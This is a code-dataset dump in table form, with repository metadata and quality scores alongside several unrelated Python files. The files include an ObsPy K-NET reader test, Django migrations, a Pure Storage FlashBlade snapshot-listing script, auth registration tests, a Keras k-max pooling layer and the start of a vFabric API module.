max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
IRIS_data_download/IRIS_download_support/obspy/io/nied/tests/test_knet_reading.py | earthinversion/Fnet_IRIS_data_automated_download | 2 | 6617351 | <filename>IRIS_data_download/IRIS_download_support/obspy/io/nied/tests/test_knet_reading.py
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
import os
import io
import unittest
import numpy as np
from obspy import read
from obspy.io.nied.knet import _is_knet_ascii
class KnetReadingTestCase(unittest.TestCase):
"""
Test reading of K-NET and KiK-net ASCII format files from a file.
"""
def setUp(self):
# Directory where the test files are located
self.path = os.path.dirname(__file__)
def test_read_knet_ascii(self):
testfile = os.path.join(self.path, 'data', 'test.knet')
tr = read(testfile)[0]
tr.data *= tr.stats.calib
tr.data -= tr.data.mean()
max = np.abs(tr.data).max() * 100 # Maximum acc converted to gal
np.testing.assert_array_almost_equal(max, tr.stats.knet.accmax,
decimal=3)
duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
self.assertEqual(duration, int(tr.stats.knet.duration))
def test_read_knet_ascii_from_open_files(self):
"""
Test reading of K-NET and KiK-net ASCII format files from an open file.
"""
testfile = os.path.join(self.path, 'data', 'test.knet')
with open(testfile, "rb") as fh:
tr = read(fh)[0]
tr.data *= tr.stats.calib
tr.data -= tr.data.mean()
max = np.abs(tr.data).max() * 100 # Maximum acc converted to gal
np.testing.assert_array_almost_equal(max, tr.stats.knet.accmax,
decimal=3)
duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
self.assertEqual(duration, int(tr.stats.knet.duration))
def test_read_knet_ascii_from_bytes_io(self):
"""
Tests that reading of K-NET and KiK-net ASCII format files from a
BytesIO object works.
"""
testfile = os.path.join(self.path, 'data', 'test.knet')
with open(testfile, "rb") as fh:
buf = io.BytesIO(fh.read())
with buf:
tr = read(buf)[0]
tr.data *= tr.stats.calib
tr.data -= tr.data.mean()
max = np.abs(tr.data).max() * 100 # Maximum acc converted to gal
np.testing.assert_array_almost_equal(max, tr.stats.knet.accmax,
decimal=3)
duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
self.assertEqual(duration, int(tr.stats.knet.duration))
def test_station_name_hack(self):
"""
Station names in K-NET and KiK-net are 6 characters long which does not
conform with the SEED standard. Test hack to write the last 2
characters of the station name into the location field.
"""
testfile = os.path.join(self.path, 'data', 'test.knet')
tr = read(testfile, convert_stnm=True)[0]
self.assertEqual(tr.stats.location, '13')
def test_is_knet_ascii(self):
"""
This tests the _is_knet_ascii method by just validating that each file
in the data directory is a K-NET ascii file and each file in the
working directory is not.
The filenames are hard coded so the test will not fail with future
changes in the structure of the package.
"""
# K-NET file names.
knet_filenames = ['test.knet']
# Non K-NET file names.
non_knet_filenames = ['test_knet_reading.py',
'__init__.py']
# Loop over K-NET files
for _i in knet_filenames:
filename = os.path.join(self.path, 'data', _i)
is_knet = _is_knet_ascii(filename)
self.assertTrue(is_knet)
# Loop over non K-NET files
for _i in non_knet_filenames:
filename = os.path.join(self.path, _i)
is_knet = _is_knet_ascii(filename)
self.assertFalse(is_knet)
def suite():
return unittest.makeSuite(KnetReadingTestCase, 'test')
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| <filename>IRIS_data_download/IRIS_download_support/obspy/io/nied/tests/test_knet_reading.py
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA @UnusedWildImport
import os
import io
import unittest
import numpy as np
from obspy import read
from obspy.io.nied.knet import _is_knet_ascii
class KnetReadingTestCase(unittest.TestCase):
"""
Test reading of K-NET and KiK-net ASCII format files from a file.
"""
def setUp(self):
# Directory where the test files are located
self.path = os.path.dirname(__file__)
def test_read_knet_ascii(self):
testfile = os.path.join(self.path, 'data', 'test.knet')
tr = read(testfile)[0]
tr.data *= tr.stats.calib
tr.data -= tr.data.mean()
max = np.abs(tr.data).max() * 100 # Maximum acc converted to gal
np.testing.assert_array_almost_equal(max, tr.stats.knet.accmax,
decimal=3)
duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
self.assertEqual(duration, int(tr.stats.knet.duration))
def test_read_knet_ascii_from_open_files(self):
"""
Test reading of K-NET and KiK-net ASCII format files from an open file.
"""
testfile = os.path.join(self.path, 'data', 'test.knet')
with open(testfile, "rb") as fh:
tr = read(fh)[0]
tr.data *= tr.stats.calib
tr.data -= tr.data.mean()
max = np.abs(tr.data).max() * 100 # Maximum acc converted to gal
np.testing.assert_array_almost_equal(max, tr.stats.knet.accmax,
decimal=3)
duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
self.assertEqual(duration, int(tr.stats.knet.duration))
def test_read_knet_ascii_from_bytes_io(self):
"""
Tests that reading of K-NET and KiK-net ASCII format files from a
BytesIO object works.
"""
testfile = os.path.join(self.path, 'data', 'test.knet')
with open(testfile, "rb") as fh:
buf = io.BytesIO(fh.read())
with buf:
tr = read(buf)[0]
tr.data *= tr.stats.calib
tr.data -= tr.data.mean()
max = np.abs(tr.data).max() * 100 # Maximum acc converted to gal
np.testing.assert_array_almost_equal(max, tr.stats.knet.accmax,
decimal=3)
duration = int(tr.stats.endtime - tr.stats.starttime + 0.5)
self.assertEqual(duration, int(tr.stats.knet.duration))
def test_station_name_hack(self):
"""
Station names in K-NET and KiK-net are 6 characters long which does not
conform with the SEED standard. Test hack to write the last 2
characters of the station name into the location field.
"""
testfile = os.path.join(self.path, 'data', 'test.knet')
tr = read(testfile, convert_stnm=True)[0]
self.assertEqual(tr.stats.location, '13')
def test_is_knet_ascii(self):
"""
This tests the _is_knet_ascii method by just validating that each file
in the data directory is a K-NET ascii file and each file in the
working directory is not.
The filenames are hard coded so the test will not fail with future
changes in the structure of the package.
"""
# K-NET file names.
knet_filenames = ['test.knet']
# Non K-NET file names.
non_knet_filenames = ['test_knet_reading.py',
'__init__.py']
# Loop over K-NET files
for _i in knet_filenames:
filename = os.path.join(self.path, 'data', _i)
is_knet = _is_knet_ascii(filename)
self.assertTrue(is_knet)
# Loop over non K-NET files
for _i in non_knet_filenames:
filename = os.path.join(self.path, _i)
is_knet = _is_knet_ascii(filename)
self.assertFalse(is_knet)
def suite():
return unittest.makeSuite(KnetReadingTestCase, 'test')
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| en | 0.871993 | # -*- coding: utf-8 -*- # NOQA @UnusedWildImport Test reading of K-NET and KiK-net ASCII format files from a file. # Directory where the test files are located # Maximum acc converted to gal Test reading of K-NET and KiK-net ASCII format files from an open file. # Maximum acc converted to gal Tests that reading of K-NET and KiK-net ASCII format files from a BytesIO object works. # Maximum acc converted to gal Station names in K-NET and KiK-net are 6 characters long which does not conform with the SEED standard. Test hack to write the last 2 characters of the station name into the location field. This tests the _is_knet_ascii method by just validating that each file in the data directory is a K-NET ascii file and each file in the working directory is not. The filenames are hard coded so the test will not fail with future changes in the structure of the package. # K-NET file names. # Non K-NET file names. # Loop over K-NET files # Loop over non K-NET files | 2.439183 | 2 |
tests/test_dataloader.py | chengweilin114/test | 2 | 6617352 | import pandas as pd
# from ..codes.dataloader import dataloader
from dataloader import dataloader
def test_dataloader():
actual_load_fname = 'ieso_ga_master_dataset_allWeather_updated2020.csv'
forecasts_fname = 'ga_forecasts_top_2.csv'
actual_load, forecasts = dataloader(actual_load_fname, forecasts_fname)
assert isinstance(actual_load, pd.DataFrame)
| import pandas as pd
# from ..codes.dataloader import dataloader
from dataloader import dataloader
def test_dataloader():
actual_load_fname = 'ieso_ga_master_dataset_allWeather_updated2020.csv'
forecasts_fname = 'ga_forecasts_top_2.csv'
actual_load, forecasts = dataloader(actual_load_fname, forecasts_fname)
assert isinstance(actual_load, pd.DataFrame)
| en | 0.178345 | # from ..codes.dataloader import dataloader | 2.349058 | 2 |
api/migrations/0003_auto_20181018_1551.py | unrealkaii/tweeto-django-api | 0 | 6617353 | # Generated by Django 2.1.2 on 2018-10-18 14:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0002_auto_20181018_1527'),
]
operations = [
migrations.CreateModel(
name='Reply',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', models.TextField(max_length=140)),
('date_created', models.DateTimeField(auto_now_add=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='replies', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('date_created',),
},
),
migrations.RemoveField(
model_name='tweet',
name='tweet_type',
),
]
| # Generated by Django 2.1.2 on 2018-10-18 14:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0002_auto_20181018_1527'),
]
operations = [
migrations.CreateModel(
name='Reply',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', models.TextField(max_length=140)),
('date_created', models.DateTimeField(auto_now_add=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='replies', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('date_created',),
},
),
migrations.RemoveField(
model_name='tweet',
name='tweet_type',
),
]
| en | 0.792752 | # Generated by Django 2.1.2 on 2018-10-18 14:51 | 1.836158 | 2 |
List_FBSnaps.py | PureStorage-OpenConnect/PythonSampleScripts | 12 | 6617354 | import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from base64 import b64encode
import os
import sys
import json
import getpass
from optparse import OptionParser
from datetime import datetime, timedelta
import time
from time import gmtime, strftime, strptime
from operator import itemgetter, attrgetter
# Global Variables
VERSION = '1.0.0'
HEADER = 'Pure Storage List FlashBlade Snapshots (' + VERSION + ')'
BANNER = ('=' * 132)
DEBUG_LEVEL = 0
VERBOSE_FLAG = False
XTOKEN = ''
def create_session(flashBlade, api_token):
global XTOKEN
# Set-up HTTP header
userAgent = 'Jakarta Commons-HttpClient/3.1'
hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'api-token' : api_token}
data = {
}
params = json.dumps(data)
path = '/api/login'
url = 'https://%s%s'%(flashBlade,path)
# Perform action
print('Attempting to create session')
response = requests.post(url, params, headers=hdrs, verify=False)
if DEBUG_LEVEL == 2:
print('URL', url)
print('respose', response)
print('Status', response.status_code)
print('Text', response.text)
print('Data', response.json)
print('HTTP Header:', response.headers)
print('x-auth-token:', response.headers['x-auth-token'])
print('')
if (response):
print(BANNER)
XTOKEN = response.headers['x-auth-token']
else:
print(BANNER)
sys.exit('Exiting: Unable to establish session')
jsonString = response.text
jsonData = json.loads(jsonString)
if VERBOSE_FLAG:
print(BANNER)
print(json.dumps(jsonData, sort_keys=False, indent=4))
name = (jsonData['username'])
welcome = 'Welcome ' + name
print(welcome)
def post_url(flashBlade,path,params):
# Set-up HTTP header
userAgent = 'Jakarta Commons-HttpClient/3.1'
hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'x-auth-token' : XTOKEN}
url = 'https://%s%s'%(flashBlade,path)
# Perform action
response = requests.post(url, params, headers=hdrs, verify=False)
if DEBUG_LEVEL != 0:
print('URL',url)
print('Response Status:', response.status_code)
print('Text', response.text)
print('Data', response.json)
print('HTTP Header:', response.headers)
print('')
jsonString = response.text
jsonData = json.loads(jsonString)
return(jsonData)
def get_url(flashBlade,path,params):
# Set-up HTTP header
userAgent = 'Jakarta Commons-HttpClient/3.1'
hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'x-auth-token' : XTOKEN}
url = 'https://%s%s'%(flashBlade,path)
payload = params
# Perform action
response = requests.get(url, headers=hdrs, verify=False)
if DEBUG_LEVEL != 0:
print('URL', url)
print('Response Status:', response.status_code)
print('Text', response.text)
print('Data', response.json)
print('HTTP Header:', response.headers)
jsonString = response.text
jsonData = json.loads(jsonString)
return(jsonData)
def list_fssnaps(flashBlade,fsname,limit):
data = ''
params = json.dumps(data)
if fsname == '':
path = '/api/1.8/file-system-snapshots?sort=name&limit=%s'%(limit)
else:
path = '/api/1.8/file-system-snapshots?sort=created&names_or_sources=%s'%(fsname)
# Perform action
jsonData = get_url(flashBlade,path,params)
r = str(jsonData)
if VERBOSE_FLAG:
print(BANNER)
print(json.dumps(jsonData, sort_keys=False, indent=4))
# Count of returned rows
res = len(jsonData['items'])
if res == 0:
print('No File System Snapshots found')
else:
print('number of snaps:', res)
x = 0
print(BANNER)
print('{0:40} {1:60} {2:20}'.format('File System', 'File System Snapshots', 'Created'))
print(BANNER)
while (x<res):
#
source = (jsonData['items'][x]['source'])
name = (jsonData['items'][x]['name'])
cdate = (jsonData['items'][x]['created'])
c1 = str(cdate)
epoch = int(c1[0:10])
created = time.strftime("%a, %d %b %Y %H:%M:%S %Z", time.localtime(epoch))
print('{0:40} {1:60} {2:20}'.format(source, name, created))
x = x + 1
def parsecl():
usage = 'usage: %prog [options]'
version = '%prog ' + VERSION
description = "This program returns Snapshots for given File System. Please contact <EMAIL> for any assistance."
parser = OptionParser(usage=usage, version=version, description=description)
parser.add_option('-d', '--debug',
type = 'int',
dest = 'DEBUG_LEVEL',
default = 0,
help = 'Debug level, used for HTTP debugging')
parser.add_option('-l', '--limit',
type = 'int',
dest = 'limit',
default = 999,
help = 'Limit number of responses [default: %default]')
parser.add_option('-p', '--password',
action = 'store',
type = 'string',
dest = 'password',
help = '<PASSWORD>')
parser.add_option('-f', '--fsname',
action = 'store',
type = 'string',
dest = 'fsname',
default = '',
help = 'File System name')
parser.add_option('-s', '--server',
action = 'store',
type = 'string',
dest = 'flashBlade',
help = 'Pure FlashArray')
parser.add_option('-t', '--token',
action = 'store',
type = 'string',
dest = 'api_token',
help = 'Pure Api Token')
parser.add_option('-v', '--verbose',
action = 'store_true',
dest = 'VERBOSE_FLAG',
default = False,
help = 'Verbose [default: %default]')
(options, args) = parser.parse_args()
'''
print("Options:", options)
print("Args:", args)
'''
return(options)
def main():
# Setup variables
global DEBUG_LEVEL
global VERBOSE_FLAG
exit_code = 0
# Check for command line parameters
options = parsecl()
flashBlade = options.flashBlade
limit = options.limit
fsname = options.fsname
api_token = options.api_token
DEBUG_LEVEL = options.DEBUG_LEVEL
VERBOSE_FLAG = options.VERBOSE_FLAG
if DEBUG_LEVEL != 0:
print('Flash Blade:', flashBlade)
print('File System:', fsname)
print('Limit:', limit)
print('Api Token:', api_token)
print('Debug Level:', DEBUG_LEVEL)
print('Verbose Flag:', VERBOSE_FLAG)
if flashBlade == None:
sys.exit('Exiting: You must provide FlashBlade details')
if api_token == None:
sys.exit('Exiting: You must provide an API Token')
print(BANNER)
print(HEADER + ' - ' + flashBlade)
print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
print(BANNER)
# Create session
create_session(flashBlade, api_token)
list_fssnaps(flashBlade,fsname,limit)
print(BANNER)
print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
print(BANNER)
sys.exit(exit_code)
main()
| import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from base64 import b64encode
import os
import sys
import json
import getpass
from optparse import OptionParser
from datetime import datetime, timedelta
import time
from time import gmtime, strftime, strptime
from operator import itemgetter, attrgetter
# Global Variables
VERSION = '1.0.0'
HEADER = 'Pure Storage List FlashBlade Snapshots (' + VERSION + ')'
BANNER = ('=' * 132)
DEBUG_LEVEL = 0
VERBOSE_FLAG = False
XTOKEN = ''
def create_session(flashBlade, api_token):
global XTOKEN
# Set-up HTTP header
userAgent = 'Jakarta Commons-HttpClient/3.1'
hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'api-token' : api_token}
data = {
}
params = json.dumps(data)
path = '/api/login'
url = 'https://%s%s'%(flashBlade,path)
# Perform action
print('Attempting to create session')
response = requests.post(url, params, headers=hdrs, verify=False)
if DEBUG_LEVEL == 2:
print('URL', url)
print('respose', response)
print('Status', response.status_code)
print('Text', response.text)
print('Data', response.json)
print('HTTP Header:', response.headers)
print('x-auth-token:', response.headers['x-auth-token'])
print('')
if (response):
print(BANNER)
XTOKEN = response.headers['x-auth-token']
else:
print(BANNER)
sys.exit('Exiting: Unable to establish session')
jsonString = response.text
jsonData = json.loads(jsonString)
if VERBOSE_FLAG:
print(BANNER)
print(json.dumps(jsonData, sort_keys=False, indent=4))
name = (jsonData['username'])
welcome = 'Welcome ' + name
print(welcome)
def post_url(flashBlade,path,params):
# Set-up HTTP header
userAgent = 'Jakarta Commons-HttpClient/3.1'
hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'x-auth-token' : XTOKEN}
url = 'https://%s%s'%(flashBlade,path)
# Perform action
response = requests.post(url, params, headers=hdrs, verify=False)
if DEBUG_LEVEL != 0:
print('URL',url)
print('Response Status:', response.status_code)
print('Text', response.text)
print('Data', response.json)
print('HTTP Header:', response.headers)
print('')
jsonString = response.text
jsonData = json.loads(jsonString)
return(jsonData)
def get_url(flashBlade,path,params):
# Set-up HTTP header
userAgent = 'Jakarta Commons-HttpClient/3.1'
hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'x-auth-token' : XTOKEN}
url = 'https://%s%s'%(flashBlade,path)
payload = params
# Perform action
response = requests.get(url, headers=hdrs, verify=False)
if DEBUG_LEVEL != 0:
print('URL', url)
print('Response Status:', response.status_code)
print('Text', response.text)
print('Data', response.json)
print('HTTP Header:', response.headers)
jsonString = response.text
jsonData = json.loads(jsonString)
return(jsonData)
def list_fssnaps(flashBlade,fsname,limit):
data = ''
params = json.dumps(data)
if fsname == '':
path = '/api/1.8/file-system-snapshots?sort=name&limit=%s'%(limit)
else:
path = '/api/1.8/file-system-snapshots?sort=created&names_or_sources=%s'%(fsname)
# Perform action
jsonData = get_url(flashBlade,path,params)
r = str(jsonData)
if VERBOSE_FLAG:
print(BANNER)
print(json.dumps(jsonData, sort_keys=False, indent=4))
# Count of returned rows
res = len(jsonData['items'])
if res == 0:
print('No File System Snapshots found')
else:
print('number of snaps:', res)
x = 0
print(BANNER)
print('{0:40} {1:60} {2:20}'.format('File System', 'File System Snapshots', 'Created'))
print(BANNER)
while (x<res):
#
source = (jsonData['items'][x]['source'])
name = (jsonData['items'][x]['name'])
cdate = (jsonData['items'][x]['created'])
c1 = str(cdate)
epoch = int(c1[0:10])
created = time.strftime("%a, %d %b %Y %H:%M:%S %Z", time.localtime(epoch))
print('{0:40} {1:60} {2:20}'.format(source, name, created))
x = x + 1
def parsecl():
usage = 'usage: %prog [options]'
version = '%prog ' + VERSION
description = "This program returns Snapshots for given File System. Please contact <EMAIL> for any assistance."
parser = OptionParser(usage=usage, version=version, description=description)
parser.add_option('-d', '--debug',
type = 'int',
dest = 'DEBUG_LEVEL',
default = 0,
help = 'Debug level, used for HTTP debugging')
parser.add_option('-l', '--limit',
type = 'int',
dest = 'limit',
default = 999,
help = 'Limit number of responses [default: %default]')
parser.add_option('-p', '--password',
action = 'store',
type = 'string',
dest = 'password',
help = '<PASSWORD>')
parser.add_option('-f', '--fsname',
action = 'store',
type = 'string',
dest = 'fsname',
default = '',
help = 'File System name')
parser.add_option('-s', '--server',
action = 'store',
type = 'string',
dest = 'flashBlade',
help = 'Pure FlashArray')
parser.add_option('-t', '--token',
action = 'store',
type = 'string',
dest = 'api_token',
help = 'Pure Api Token')
parser.add_option('-v', '--verbose',
action = 'store_true',
dest = 'VERBOSE_FLAG',
default = False,
help = 'Verbose [default: %default]')
(options, args) = parser.parse_args()
'''
print("Options:", options)
print("Args:", args)
'''
return(options)
def main():
# Setup variables
global DEBUG_LEVEL
global VERBOSE_FLAG
exit_code = 0
# Check for command line parameters
options = parsecl()
flashBlade = options.flashBlade
limit = options.limit
fsname = options.fsname
api_token = options.api_token
DEBUG_LEVEL = options.DEBUG_LEVEL
VERBOSE_FLAG = options.VERBOSE_FLAG
if DEBUG_LEVEL != 0:
print('Flash Blade:', flashBlade)
print('File System:', fsname)
print('Limit:', limit)
print('Api Token:', api_token)
print('Debug Level:', DEBUG_LEVEL)
print('Verbose Flag:', VERBOSE_FLAG)
if flashBlade == None:
sys.exit('Exiting: You must provide FlashBlade details')
if api_token == None:
sys.exit('Exiting: You must provide an API Token')
print(BANNER)
print(HEADER + ' - ' + flashBlade)
print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
print(BANNER)
# Create session
create_session(flashBlade, api_token)
list_fssnaps(flashBlade,fsname,limit)
print(BANNER)
print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))
print(BANNER)
sys.exit(exit_code)
main()
| en | 0.520473 | # Global Variables # Set-up HTTP header # Perform action # Set-up HTTP header # Perform action # Set-up HTTP header # Perform action # Perform action # Count of returned rows # print("Options:", options) print("Args:", args) # Setup variables # Check for command line parameters # Create session | 2.447586 | 2 |
tests/registering_tests.py | varajala/flask-auth-server | 1 | 6617355 | <gh_stars>1-10
import microtest
from auth_server.extensions import orm
from auth_server.models import User
import auth_server.security as security
@microtest.setup
def setup(app):
global ctx
ctx = app.app_context()
ctx.push()
@microtest.reset
def reset():
User.query.delete()
@microtest.cleanup
def cleanup():
reset_database()
ctx.pop()
@microtest.test
def test_typechecking():
#invalid_type
assert microtest.raises(
security.register_user,
{'email': 10, 'password': '1', 'password_confirm': '2'},
TypeError
)
#missing_arg
assert microtest.raises(
security.register_user,
{'email': '1', 'password': '2'},
TypeError
)
@microtest.test
def test_valid_registering():
error = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is None
user = User.query.filter_by(email='<EMAIL>').first()
assert user is not None
assert not user.is_verified
@microtest.test
def test_registering_invalid_email():
error = security.register_user(email='asd', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0
@microtest.test
def test_registering_email_in_user():
USED_EMAIL = '<EMAIL>'
user = User(email = USED_EMAIL, password_hash = '')
orm.session.add(user)
error = security.register_user(email=USED_EMAIL, password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
@microtest.test
def test_registering_invalid_password():
error = security.register_user(email='<EMAIL>', password=' <PASSWORD>', password_confirm=' <PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0
@microtest.test
def test_registering_invalid_password_confirm():
error = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0
| import microtest
from auth_server.extensions import orm
from auth_server.models import User
import auth_server.security as security
@microtest.setup
def setup(app):
global ctx
ctx = app.app_context()
ctx.push()
@microtest.reset
def reset():
User.query.delete()
@microtest.cleanup
def cleanup():
reset_database()
ctx.pop()
@microtest.test
def test_typechecking():
#invalid_type
assert microtest.raises(
security.register_user,
{'email': 10, 'password': '1', 'password_confirm': '2'},
TypeError
)
#missing_arg
assert microtest.raises(
security.register_user,
{'email': '1', 'password': '2'},
TypeError
)
@microtest.test
def test_valid_registering():
error = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is None
user = User.query.filter_by(email='<EMAIL>').first()
assert user is not None
assert not user.is_verified
@microtest.test
def test_registering_invalid_email():
error = security.register_user(email='asd', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0
@microtest.test
def test_registering_email_in_user():
USED_EMAIL = '<EMAIL>'
user = User(email = USED_EMAIL, password_hash = '')
orm.session.add(user)
error = security.register_user(email=USED_EMAIL, password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
@microtest.test
def test_registering_invalid_password():
error = security.register_user(email='<EMAIL>', password=' <PASSWORD>', password_confirm=' <PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0
@microtest.test
def test_registering_invalid_password_confirm():
error = security.register_user(email='<EMAIL>', password='<PASSWORD>', password_confirm='<PASSWORD>')
assert error is not None
assert len(User.query.all()) == 0 | zh | 0.08791 | #invalid_type #missing_arg | 2.521115 | 3 |
k_maxpooling.py | evu/VDCNN | 0 | 6617356 | <reponame>evu/VDCNN<filename>k_maxpooling.py
"""Keras layer to extract k highest activations from a sequence."""
import tensorflow as tf
class KMaxPooling(tf.keras.layers.Layer):
"""K-max pooling layer that extracts the k-highest activations from a sequence (2nd dimension)."""
def __init__(self, k=1, sort=True, **kwargs):
super().__init__(**kwargs)
self.input_spec = tf.keras.layers.InputSpec(ndim=3)
self.k = k
self.sort = sort
def get_config(self):
super().get_config()
def compute_output_shape(self, input_shape):
return input_shape[0], self.k, input_shape[2]
def call(self, inputs):
# swap last two dimensions since top_k will be applied along the last dimension
shifted_inputs = tf.transpose(inputs, [0, 2, 1])
# extract top_k, returns two tensors [values, indices]
top_k = tf.math.top_k(shifted_inputs, k=self.k, sorted=self.sort)[0]
# return flattened output
return tf.transpose(top_k, [0, 2, 1])
| """Keras layer to extract k highest activations from a sequence."""
import tensorflow as tf
class KMaxPooling(tf.keras.layers.Layer):
"""K-max pooling layer that extracts the k-highest activations from a sequence (2nd dimension)."""
def __init__(self, k=1, sort=True, **kwargs):
super().__init__(**kwargs)
self.input_spec = tf.keras.layers.InputSpec(ndim=3)
self.k = k
self.sort = sort
def get_config(self):
super().get_config()
def compute_output_shape(self, input_shape):
return input_shape[0], self.k, input_shape[2]
def call(self, inputs):
# swap last two dimensions since top_k will be applied along the last dimension
shifted_inputs = tf.transpose(inputs, [0, 2, 1])
# extract top_k, returns two tensors [values, indices]
top_k = tf.math.top_k(shifted_inputs, k=self.k, sorted=self.sort)[0]
# return flattened output
return tf.transpose(top_k, [0, 2, 1]) | en | 0.824535 | Keras layer to extract k highest activations from a sequence. K-max pooling layer that extracts the k-highest activations from a sequence (2nd dimension). # swap last two dimensions since top_k will be applied along the last dimension # extract top_k, returns two tensors [values, indices] # return flattened output | 3.549996 | 4 |
iscc_generator/migrations/0004_rights_field.py | iscc/iscc-service-generator | 2 | 6617357 | # Generated by Django 4.0.4 on 2022-04-29 16:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("iscc_generator", "0003_nft_fields"),
]
operations = [
migrations.AddField(
model_name="iscccode",
name="rights",
field=models.CharField(
blank=True,
default=None,
help_text="Copyright notice",
max_length=1024,
null=True,
verbose_name="rights",
),
),
]
| # Generated by Django 4.0.4 on 2022-04-29 16:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("iscc_generator", "0003_nft_fields"),
]
operations = [
migrations.AddField(
model_name="iscccode",
name="rights",
field=models.CharField(
blank=True,
default=None,
help_text="Copyright notice",
max_length=1024,
null=True,
verbose_name="rights",
),
),
]
| en | 0.878096 | # Generated by Django 4.0.4 on 2022-04-29 16:44 | 1.649689 | 2 |
vas/shared/InstallationImages.py | spring-operator/vas-python-api | 0 | 6617358 | <reponame>spring-operator/vas-python-api<filename>vas/shared/InstallationImages.py<gh_stars>0
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
class InstallationImages(MutableCollection):
"""A collection of installation images
:ivar `vas.shared.Security.Security` security: The resource's security
"""
def __init__(self, client, location, installation_image_class):
super(InstallationImages, self).__init__(client, location, 'installation-images', installation_image_class)
def create(self, path, version):
"""Creates an installation image by uploading a file to the server and assigning it a version
:param str path: The path of the file to upload
:param str version: The installation image's version
:rtype: :class:`vas.shared.InstallationImages.InstallationImage`
:return: The new installation image
"""
return self._create_multipart(path, {'version': version})
class InstallationImage(Resource, Deletable):
"""A product binary, typically are .zip or .tar.gz file, that has been uploaded to the server. Once created, an
installation image can then be used to create an installation on a group.
:ivar `vas.shared.Installations.Installations` installations: The installations that have been created from the
installation image
:ivar `vas.shared.Security.Security` security: The resource's security
:ivar int size: The installation image's size
:ivar str version: The installation image's version
"""
@property
def installations(self):
self.__installations = self.__installations or self._create_resources_from_links('installation',
self.__installation_class)
return self.__installations
@property
def size(self):
return self.__size
@property
def version(self):
return self.__version
def __init__(self, client, location, installation_class):
super(InstallationImage, self).__init__(client, location)
self.__installation_class = installation_class
self.__size = self._details['size']
self.__version = self._details['version']
def reload(self):
"""Reloads the installation image's details from the server"""
super(InstallationImage, self).reload()
self.__installations = None
def __str__(self):
return "<{} version={} size={}>".format(self.__class__.__name__, self.__version, self.__size)
| # vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
